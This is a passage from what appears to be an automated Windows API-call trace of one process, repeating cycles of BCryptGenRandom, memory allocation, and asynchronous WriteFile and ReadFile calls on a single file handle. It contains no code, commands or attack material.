lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.649] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.649] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.649] free (_Block=0x3e305b8) [0204.649] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.649] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.649] free (_Block=0x1fa91d0) [0204.649] free (_Block=0x1fa2ed8) [0204.649] free (_Block=0x1fa90b8) [0204.649] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.650] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.661] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.661] CloseHandle (hObject=0x3cc) returned 1 [0204.661] free (_Block=0x3df0008) [0204.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.669] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.670] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.670] free (_Block=0x3e305b8) [0204.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.670] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.671] free (_Block=0x1fa91d0) [0204.671] free (_Block=0x1fa2ed8) [0204.671] free (_Block=0x1fa90b8) [0204.671] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.671] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.691] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xad, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.691] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.691] CloseHandle (hObject=0x3cc) returned 1 [0204.691] free (_Block=0x3df0008) [0204.691] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.699] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.700] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.700] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.700] free (_Block=0x3e305b8) [0204.701] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.701] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.701] free (_Block=0x1fa91d0) [0204.701] free (_Block=0x1fa2ed8) [0204.701] free (_Block=0x1fa90b8) [0204.701] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.702] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.722] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xeb, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.722] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.723] CloseHandle (hObject=0x3cc) returned 1 [0204.723] free (_Block=0x3df0008) [0204.723] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.731] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.733] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.733] free (_Block=0x3e305b8) [0204.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.733] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.733] free (_Block=0x1fa91d0) [0204.733] free (_Block=0x1fa2ed8) [0204.733] free (_Block=0x1fa90b8) [0204.733] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.734] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.767] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.768] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.768] CloseHandle (hObject=0x3cc) returned 1 [0204.768] free (_Block=0x3df0008) [0204.768] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.778] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.778] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.778] free (_Block=0x3e305b8) [0204.778] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.778] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.779] free (_Block=0x1fa91d0) [0204.779] free (_Block=0x1fa2ed8) [0204.779] free (_Block=0x1fa90b8) [0204.779] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.781] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.798] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.799] CloseHandle (hObject=0x3cc) returned 1 [0204.799] free (_Block=0x3df0008) [0204.799] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.830] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.830] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.830] free (_Block=0x3e305b8) [0204.830] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.830] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.831] free (_Block=0x1fa91d0) [0204.831] free (_Block=0x1fa2ed8) [0204.831] free (_Block=0x1fa90b8) [0204.831] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.832] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.842] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.843] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.843] CloseHandle (hObject=0x3cc) returned 1 [0204.843] free (_Block=0x3df0008) [0204.843] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.853] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.853] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.853] free (_Block=0x3e305b8) [0204.853] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.853] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.854] free (_Block=0x1fa91d0) [0204.854] free (_Block=0x1fa2ed8) [0204.854] free (_Block=0x1fa90b8) [0204.854] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.854] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.865] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x148, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.865] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.865] CloseHandle (hObject=0x3cc) returned 1 [0204.866] free (_Block=0x3df0008) [0204.866] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.873] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.874] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.874] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.874] free (_Block=0x3e305b8) [0204.874] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.874] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.875] free (_Block=0x1fa91d0) [0204.875] free (_Block=0x1fa2ed8) [0204.875] free (_Block=0x1fa90b8) [0204.875] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.875] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.875] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.876] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.905] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x12b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.906] CloseHandle (hObject=0x3cc) returned 1 [0204.906] free (_Block=0x3df0008) [0204.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0204.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0204.917] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.917] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.917] free (_Block=0x3e305b8) [0204.917] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.918] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.918] free (_Block=0x1fa91d0) [0204.918] free (_Block=0x1fa2ed8) [0204.918] free (_Block=0x1fa90b8) [0204.918] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.918] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, 